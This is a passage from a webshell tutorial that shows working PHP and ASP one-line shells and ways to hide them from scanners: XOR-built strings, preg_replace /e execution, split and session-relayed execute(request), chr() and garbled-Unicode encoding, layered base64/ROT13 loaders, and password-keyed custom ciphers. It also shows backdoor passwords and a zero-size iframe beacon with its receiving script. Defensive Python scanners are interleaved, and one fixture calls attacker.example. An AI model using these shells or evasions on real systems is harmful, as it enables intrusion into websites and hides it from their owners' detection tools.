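    if conf.get("allow_url_include", "").lower() in TRUTHY:
        findings.append((source, "allow_url_include", conf["allow_url_include"], ["remote include() is possible"]))
    return findings


if __name__ == "__main__":
    for f in audit_php_config(parse_php_ini(SAMPLE_PHP_INI), "php.ini") + \
             audit_php_config(parse_htaccess(SAMPLE_HTACCESS), ".htaccess"):
        print("%-9s %-18s = %-10s -> %s" % f)
```

Run it against the real php.ini plus every .user.ini and .htaccess under the web root; a prepend or append file that resolves into the web tree, or one the administrator did not put there, is the header-and-footer shell described above.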
③ 404 shell
A 404 shell shows a "page not found" error when it is requested, but the shell code has in fact already run. The real interface is typically brought up by pressing Shift five times on the page.

4. Anti-detection for one-line shells
1. Construction method to bypass detection (PHP)
Most detection programs filter on strings such as "_POST", "system" and "call_user_func_array". Such filters can sometimes be bypassed by constructing those strings at run time. The basic idea is that every character has a numeric value, so any character in the shell can be replaced by the XOR of two other characters whose values combine to it; only the two innocuous characters appear in the source. For example:

    <?php
    @$_++;               // $_ is undefined, so ++ turns null into 1
    $__=("#"^"|");       // "_"
    $__.=("."^"~");      // "P"
    $__.=("/"^"`");      // "O"
    $__.=("|"^"/");      // "S"
    $__.=("{"^"/");      // "T"
    ?>

The one-line shell can then be written as

    <?php
    @$_++;
    $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");   // $__ is now "_POST"
    @${$__}[!$_](${$__}[$_]);
    ?>

which executes as @$_POST[0]($_POST[1]): !$_ is the negation of 1, and since 1 is true in the language, the negation is false, which as an array index is 0; ${$__} is a variable variable, so ${"_POST"} is $_POST. The attacker POSTs the function name in parameter 0 and its argument in parameter 1.

This bypass is fairly weak, though. A scanner that evaluates constant expressions folds ("#"^"|") back into "_" before matching, so the "_POST" signature is found anyway; the same applies to writing the characters as hexadecimal escapes ("\x5f\x50..."), which PHP decodes to the same string and a scanner can decode just as easily.

2. Regular expression replacement method (PHP)
PHP's preg_replace() performs regular-expression replacement. Using it to bypass detection relies on a feature of the language: with the /e modifier, the replacement string is evaluated as PHP code after the back-references are substituted, so if the replaced text contains code, the code runs.

    <?php
    function funfunc($str) {}
    echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
    ?>

The code first defines an empty function, then uses preg_replace() to replace the <title> element in the submitted cmd form field with a call to funfunc. If the POSTed value is <title>{${phpinfo()}}</title> (phpinfo() can of course be replaced with any other call), the replacement becomes funfunc("{${phpinfo()}}"), and because ${} inside a double-quoted string is interpolated, phpinfo() is executed when the replacement string is evaluated. Note that the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where preg_replace() refuses it with a warning, so this variant only works on PHP 5.

3. Instant generation method (PHP)
When the include approach is used, the included PHP file is easily picked up by a scanner. An alternative is to use file_put_contents() to write a file containing the one-line shell just before it is accessed, so the shell only exists on disk for the moment it is needed. The function itself is sensitive, however, and is easily flagged.

4. Evasion method (ASP)
Because some ASP servers filter the usual one-line form, the same thing can be written as a server-side script block:

    <script language="VBScript" runat="server">execute request("cmd")</script>

The function is the same; only the form changes. A specific script language can also be avoided altogether, for instance with an ASPX one-liner written in C#:

    <script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script>

Only the instantiation line is shown here; the WebAdmin2Y.x.y class it constructs is defined elsewhere in the same shell file.

5. Splitting method (ASP)
Split the one-line shell into pieces. The chance of getting through is small, but it is still a technique: some servers run very elaborate scans yet overlook small things. There is also a strengthened split version:

    <% If Request("MH")<>"" Then Execute(Request("MH")) %>
    <% if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH") %>

Both lines use an If statement to pull the statement apart. The central idea is to break up the sensitive characters: the usual ASP signatures are eval(request and execute(request, and once those strings no longer occur as written, the signature is not found and the shell passes. The first line still contains Execute(Request( and only changes the surrounding shape; the second goes further, parking the request value in a session variable and executing session("MH"), so that execute and request never meet in one statement.

6. Garbled transformation (ANSI to Unicode encoding)

    <%eval request("#")%>

is transformed into "┼攠數畣整爠煥敵瑳∨∣┩愾". (Those characters are what the ASCII bytes of <% execute request("#")%> look like when read two at a time as UTF-16LE code units, which is why an editor shows garbage where the signature would otherwise sit.)

    <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>

The line above uses ASCII encoding: chr(114) is the character with ASCII code 114, that is "r", and the seven chr() calls together spell "request". The inner eval("request") yields the Request object, ("brute") reads that parameter from it, and the outer eval executes what was sent, so the code converts to

    <%eval(request("brute"))%>
7. Anti-detection for large webshells
(1) base64 encoding
A large shell can be protected by compressing its code, base64-encoding the compressed result and then appending a loader to the end:

    <?php @eval(gzinflate(base64_decode($code))); ?>

Here the $code variable holds the base64 text. At run time it is base64-decoded, decompressed with gzinflate() and executed by eval(). This is no real protection, however: base64_decode and eval are themselves on the signature lists, so the loader is caught when it passes through a scanner.

(2) ROT13 encoding (PHP)
str_rot13() is a PHP encoding function that can be applied to script code to bypass signature detection. In the variant discussed here, strrev() is used to reverse strings, and function names are deliberately broken up with '.' concatenation to escape signature matching. The three str_rot13()-encoded names are, in order, gzinflate, str_rot13 and base64_decode, which amounts to three layers of encoding and keeps the two signatures gzinflate and base64_decode out of the file. str_rot13 itself cannot be avoided, though, and some anti-virus products use it as a signature too. ROT13 means "rotate by 13": each letter is replaced by the letter 13 positions further along the alphabet, wrapping around, and because 26 = 2 × 13, applying it a second time restores the original. As the algorithm is fixed and has no key, its strength is negligible, and decoding is as simple as encoding once more.

(3) Other encodings
Anti-virus software and scanners generally rely on signatures to decide whether a file is malicious. When hardening a large shell, a small shell or a one-liner against detection, the usual approach with PHP or ASP is to run the script through an encoding function such as base64 or ROT13, but those are well known. A better approach is to write your own encoding: borrow ideas from the Caesar cipher and other shift ciphers, write a small algorithm, and encode the script with it. The base64 and rot13 signatures then disappear, and the home-made decoder can be used directly without any further trouble: encode the sensitive parts and decode them at run time. Keyed algorithms such as DES or RSA can also be used. A large shell usually has a password login box, and the login password can double as the decryption key, so the body can only be decoded after the correct password is entered. This serves two purposes: it defeats scanners and anti-virus on the one hand, and on the other hand, even if someone else obtains the shell, they cannot decrypt it and read its source. Bear in mind that the decoder and the eval() it feeds still sit in the file in clear, and those are what behaviour-based scanners key on.
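The one-line shell evasions above (XOR construction, chr() encoding, the request/session split, the garbled Unicode form) and this section's base64/gzinflate and ROT13 layers all target plain signature matching. As an added example that is not the page's code, the Python scanner below normalises those transformations away before matching and descends into decoded layers. SIGNATURES, the function names, the gzdeflate helper (which mimics PHP's raw-DEFLATE output) and the SAMPLES are all constructed here.

```python
import base64
import codecs
import re
import zlib

# Added example (not from the page): signature scan that first undoes the evasions
# described above. Names and samples are constructed for this example.
SIGNATURES = {
    "asp_eval_request": re.compile(r"\b(eval|execute)\s*\(?\s*request\s*\(", re.I),
    "php_superglobal_call": re.compile(r"\$_(POST|GET|REQUEST)\s*\[[^\]]*\]\s*\(", re.I),
    "php_eval_superglobal": re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST)", re.I),
    "php_gzinflate_base64": re.compile(r"gzinflate\s*\(\s*base64_decode", re.I),
    "php_str_rot13": re.compile(r"\bstr_rot13\s*\(", re.I),
    "php_preg_replace_e": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/\w*e\w*['\"]", re.I | re.S),
}


def unfold_utf16le(src):
    """ASCII shell bytes viewed as UTF-16LE look like CJK garbage; view them as ASCII again."""
    try:
        raw = src.encode("utf-16-le").decode("ascii")
    except UnicodeError:
        return src
    return raw if all(c.isprintable() or c in "\r\n\t" for c in raw) else src


def fold_php_xor(src):
    """("#"^"|") -> "_", then "_"."P" -> "_P", then ${$v} -> $<value assigned to v>."""
    def xor(m):
        c = chr(ord(m.group(1)) ^ ord(m.group(2)))
        return '"%s"' % c if c not in '"\\' else m.group(0)
    src = re.sub(r'\(\s*"([^"\\])"\s*\^\s*"([^"\\])"\s*\)', xor, src)
    src = re.sub(r'(?<=\w)"\s*\.\s*"(?=\w)', "", src)
    values = {}
    for name, op, val in re.findall(r'\$(\w+)\s*(\.?=)\s*"([^"]*)"\s*;', src):
        values[name] = values.get(name, "") + val if op == ".=" else val
    for name, val in values.items():
        src = src.replace("${$%s}" % name, "$" + val)
    return src


def fold_vbs_chr(src):
    """chr(114)+chr(101)+... -> "request"; eval("request")(x) -> request(x)."""
    src = re.sub(r"\bchr\((\d+)\)", lambda m: '"%s"' % chr(int(m.group(1))), src, flags=re.I)
    src = re.sub(r'"\s*[+&]\s*"', "", src)
    return re.sub(r'\beval\s*\(\s*"request"\s*\)', "request", src, flags=re.I)


def asp_session_relay(src):
    """request("X") parked in session("X") and executed later defeats the execute(request signature."""
    hits = []
    for key in set(re.findall(r'session\("(\w+)"\)\s*=\s*request\(', src, re.I)):
        if re.search(r'\b(eval|execute)\s*\(?\s*session\("%s"\)' % re.escape(key), src, re.I):
            hits.append("asp_execute_via_session:" + key)
    return hits


def decoded_layers(src):
    """Plaintext hidden inside base64 / gzinflate(base64) / str_rot13 string literals."""
    for lit in re.findall(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']', src, re.I):
        try:
            blob = base64.b64decode(lit, validate=True)
        except ValueError:
            continue
        yield blob.decode("utf-8", "replace")
        try:
            yield zlib.decompress(blob, -15).decode("utf-8", "replace")  # PHP gzinflate()
        except zlib.error:
            pass
    for lit in re.findall(r'str_rot13\s*\(\s*["\']([^"\']+)["\']', src, re.I):
        yield codecs.decode(lit, "rot_13")


def scan(src, depth=0):
    """Sorted signature names that fire on src after normalisation, or on any decoded layer."""
    src = fold_vbs_chr(fold_php_xor(unfold_utf16le(src)))
    hits = {name for name, rx in SIGNATURES.items() if rx.search(src)}
    hits.update(asp_session_relay(src))
    if depth < 3:
        for inner in decoded_layers(src):
            hits.update("inner:" + h for h in scan(inner, depth + 1))
    return sorted(hits)


def gzdeflate(data):
    """PHP gzdeflate(): raw DEFLATE without zlib header or checksum."""
    c = zlib.compressobj(wbits=-15)
    return c.compress(data) + c.flush()


SAMPLES = {  # constructed inputs modelled on the forms discussed on the page
    "xor": '<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); @${$__}[!$_](${$__}[$_]); ?>',
    "chr": '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>',
    "split": '<% if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH") %>',
    "garbled": '<% execute request("#") %>'.encode("ascii").decode("utf-16-le"),
    "layered": '<?php @eval(gzinflate(base64_decode("%s"))); ?>'
               % base64.b64encode(gzdeflate(b'<?php eval($_POST["x"]); ?>')).decode(),
    "benign": '<?php echo htmlspecialchars($_GET["q"]); ?>',
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print("%-8s %s" % (label, scan(src) or "clean"))
```

Each normaliser is deliberately narrow: it only undoes the exact trick the page describes, so the scanner stays cheap and does not need to execute the script. A home-made cipher of the kind proposed in (3) would get past it, which is the point the text makes; what it cannot hide is the decoder and the eval() that follow it.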
5. About backdoors in webshells
Large shells downloaded from the internet almost always contain backdoors of one kind or another, and these lead directly to the site you got into being taken over by someone else, so a downloaded shell must first be checked for backdoors. For example, the universal password here:

    ...
    end function
    if session("hehe")="" then
        if request.form("pass")=userpass or request.form("pass")="1111111" then
            session("hehe")=userpass
            response.redirect url
        else
    ...

Here

    request.form("pass")=userpass

is the original check of the submitted pass value: if it equals userpass, authentication succeeds. But the later

    or request.form("pass")="1111111"

means a submitted pass of 1111111 also logs in to the shell. Of course it is not always this simple. The original author can, for instance, assign userpass in two places and add a trigger that changes userpass when he logs in (for example, a failed login triggers an update of userpass), so that a suffix is appended; moreover, the trigger code and the verification code are far apart and hard to find. In that case the shell's code has to be analysed line by line.

Then use a frame to plant the shell:

    <iframe src="backdoor address" width=0 height=0></iframe>

Here the frame's width and height are set to 0, so it is invisible on the page. The "backdoor address" points to a receiving script of your own, which you host on a public server you control. The receiving script is as follows:

    <%
    url=Request.ServerVariables("HTTP_REFERER")
    set fs=server.CreateObject("Scripting.FileSystemObject")
    set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
    file.writeline url
    file.close
    set file=nothing
    set fs=nothing
    %>

where

    url=Request.ServerVariables("HTTP_REFERER")

reads the Referer header of the request, that is, the URL of the shell page that loaded the frame; the URL is then appended (8 is ForAppending, and True creates hehe.txt if it is missing) to hehe.txt in the receiving script's directory, giving the original author a running list of every site where the shell has been installed. Modern browsers apply a default referrer policy of strict-origin-when-cross-origin, which trims a cross-origin Referer to scheme and host, so a receiver like this now usually learns only the site, not the shell's full path.
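An added example, not the page's code: a Python audit that checks a downloaded shell's source for both backdoors described above, the OR-ed alternative password (including the password variable being reassigned somewhere else in the file) and a zero-size frame or image that loads a remote address. SAMPLE_SHELL is a constructed ASP fragment modelled on the listing above, and attacker.example is a placeholder host.

```python
import re

# Added example (not from the page): audit a downloaded large shell for planted backdoors.
ALT_PASSWORD = re.compile(r'\bor\s+request(?:\.form)?\s*\(\s*"pass"\s*\)\s*=\s*"([^"]+)"', re.I)
SRC_TAG = re.compile(r'<(iframe|frame|img|script)\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)
HIDDEN = re.compile(r'\b(?:width|height)\s*=\s*["\']?0\b|display\s*:\s*none|visibility\s*:\s*hidden', re.I)
PASS_CHECK = re.compile(r'request(?:\.form)?\s*\(\s*"pass"\s*\)\s*=\s*(\w+)', re.I)

SAMPLE_SHELL = '''<%
UserPass = "admin888"
url = Request.ServerVariables("URL")
Sub Login()
  If Session("hehe") = "" Then
    If Request.Form("pass") = UserPass Or Request.Form("pass") = "1111111" Then
      Session("hehe") = UserPass
      Response.Redirect url
    Else
      UserPass = UserPass & "x"
    End If
  End If
End Sub
%>
<iframe src="http://attacker.example/collect.asp" width=0 height=0></iframe>
<img src="/img/logo.gif" width=0 height=0>
'''


def audit_shell(src):
    """Return (line, finding, detail) triples for the backdoor patterns found in src."""
    findings = []
    lines = src.splitlines()
    for n, line in enumerate(lines, 1):
        for m in ALT_PASSWORD.finditer(line):
            findings.append((n, "hardcoded_alt_password", m.group(1)))
        for m in SRC_TAG.finditer(line):
            tag, target = m.group(1).lower(), m.group(2)
            # a zero-size or invisible element pulling a remote URL is the referer beacon
            if HIDDEN.search(m.group(0)) and re.match(r"(?:https?:)?//", target, re.I):
                findings.append((n, "hidden_remote_" + tag, target))
    m = PASS_CHECK.search(src)  # whichever variable the real check compares against
    if m:
        var = re.escape(m.group(1))
        assigns = [n for n, line in enumerate(lines, 1)
                   if re.match(r"\s*(?:const\s+|dim\s+)?%s\s*=" % var, line, re.I)]
        if len(assigns) > 1:  # set once at the top, then changed again somewhere far away
            findings.append((assigns[1], "password_reassigned", "also set on line %d" % assigns[0]))
    return findings


if __name__ == "__main__":
    for n, finding, detail in audit_shell(SAMPLE_SHELL):
        print("line %2d  %-24s %s" % (n, finding, detail))
```

The reassignment check is what finds the "far apart" trigger the text warns about: it takes the variable name from the genuine comparison and reports every other line that writes to it, so the reviewer knows exactly where to read instead of going through the whole shell.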
To remove this kind of backdoor, first disable the second password check in the shell, the master password, by deleting the relevant code. Then check every page of the ASP shell for a hidden URL with attributes such as width=0 height=0, and delete it when found.
The above has covered the implementation and hiding of webshells in a number of aspects. I hope it will be helpful to friends who are interested in PHP tutorials.
